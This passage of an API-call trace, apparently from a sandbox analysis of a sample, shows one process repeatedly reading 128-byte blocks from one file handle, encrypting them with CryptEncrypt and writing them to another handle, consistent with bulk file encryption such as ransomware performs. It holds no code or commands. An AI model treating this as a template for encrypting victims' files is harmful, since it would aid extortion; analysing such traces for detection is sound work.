lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.180] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.180] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.181] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.181] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.181] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.181] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.181] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.181] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.228] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.228] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.228] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.228] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.228] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.228] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.229] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.229] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.230] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.230] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.231] WriteFile (in: hFile=0xc4, 